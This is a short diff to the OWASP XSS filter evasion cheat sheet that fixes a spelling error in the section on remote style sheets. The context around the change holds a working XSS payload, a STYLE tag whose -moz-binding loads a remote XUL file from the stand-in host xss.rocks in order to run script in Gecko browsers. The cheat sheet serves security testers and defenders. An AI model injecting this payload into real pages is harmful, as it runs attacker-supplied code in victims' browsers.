OWASP/CheatSheetSeries/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md

 ### Remote style sheet part 4

 This only works in Gecko rendering engines and works by binding an XUL file to the parent page.
-I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites:
+I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites:

 `<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>`